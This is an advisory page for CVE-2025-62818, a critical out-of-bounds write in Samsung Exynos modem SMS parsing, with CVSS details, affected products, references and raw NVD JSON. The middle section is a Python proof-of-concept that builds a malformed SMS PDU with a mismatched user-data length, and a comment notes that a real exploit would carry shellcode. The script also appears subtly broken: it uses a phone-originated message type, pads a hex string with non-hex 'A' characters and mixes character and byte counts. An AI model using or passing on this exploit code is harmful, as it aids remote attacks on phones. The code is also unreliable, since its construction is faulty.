CVE-2025-62818

Description

An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. An out-of-bounds write occurs due to a mismatch between the TP-UDHI and UDL values when processing an SMS TP-UD packet.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:* - NOT VULNERABLE

Exynos 980

Exynos 990

Exynos 850

Exynos 1080

Exynos 2100

Exynos 1280

Exynos 2200

Exynos 1330

Exynos 1380

Exynos 1480

Exynos 2400

Exynos 1580

Exynos 2500

Exynos 9110

Exynos W920

Exynos W930

Exynos W1000

Modem 5123

Modem 5300

Modem 5400

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2025-62818: Samsung Exynos SMS TP-UD OOB Write
# This script demonstrates the construction of a malformed SMS PDU.
# The vulnerability is triggered when TP-UDHI and UDL values are mismatched.

def generate_malformed_sms():
    # SCA (Service Center Address) - Length 0 implies default SC
    sca = "00"

    # PDU Type (First Octet)
    # TP-MTI: 01 (SMS-SUBMIT)
    # TP-UDHI: 1 (User Data Header present)
    # TP-RD: 0, TP-VPF: 10, TP-SRR: 0
    pdu_type = "01" # Binary: 00000001 (Simplified for PoC structure)
    # Actually combining bits: Submit(01) + UDHI(40) -> 41
    first_octet = "41"

    # TP-MR (Message Reference)
    mr = "00"

    # TP-DA (Destination Address)
    # Length and Type
    da_len = "0B" # 11 digits
    da_type = "91" # International
    da_number = "116100323456F7" # Example number

    # TP-PID (Protocol Identifier)
    pid = "00"

    # TP-DCS (Data Coding Scheme)
    dcs = "00"

    # TP-VP (Validity Period)
    vp = "AA"

    # TP-UDL (User Data Length) - The trigger
    # Setting a length that causes buffer overflow relative to UDH
    ud_len = "FF" # 255 bytes claimed

    # TP-UD (User Data)
    # UDH Header IEI, IEDL, IED
    # Example: Application Port Addressing (0x05)
    udh = "05" # IEI
    udh += "04" # IEDL (4 bytes data)
    udh += "8102F301" # IED (Port 2948 to 3502)

    # Padding to simulate the payload causing OOB write
    # In a real exploit, this payload would contain shellcode or ROP gadgets
    payload = "A" * (int(ud_len, 16) - len(udh) - 1)

    # Construct full PDU
    # Note: UDL calculation in the firmware is the vulnerable part
    pdu = sca + first_octet + mr + da_len + da_type + da_number + pid + dcs + vp + ud_len + udh + payload

    return pdu

if __name__ == "__main__":
    print("[+] Generating malformed SMS PDU for CVE-2025-62818")
    payload = generate_malformed_sms()
    print(f"[+] Malformed PDU Hex: {payload}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62818
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62818
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62818/
[4] VulDB https://vuldb.com/cve/CVE-2025-62818
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-62818/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62818", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:34.060", "lastModified": "2026-04-13T15:31:39.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. An out-of-bounds write occurs due to a mismatch between the TP-UDHI and UDL values when processing an SMS TP-UD packet."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCF6C91D-DECE-4630-85FE-C22EF2B9160A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:*", "matchCriteriaId": "87FE8214-E165-4874-BB5A-3C4298708039"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F18F62E-2012-442E-BE60-6E76325D1824"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8701B6-6989-44D1-873A-A1823BFD7CCC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1928760C-4FC4-45B0-84FF-C1105CD1DD2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB410A6D-642B-49AE-8B1C-EADA953A84DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "43DE4D6F-D662-46F2-93BC-9AE950320BDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE06CD56-8BFD-4208-843A-179E3E6F5C10"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3594664-3CE6-4827-ABD4-B5719817F5D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria" ... (truncated)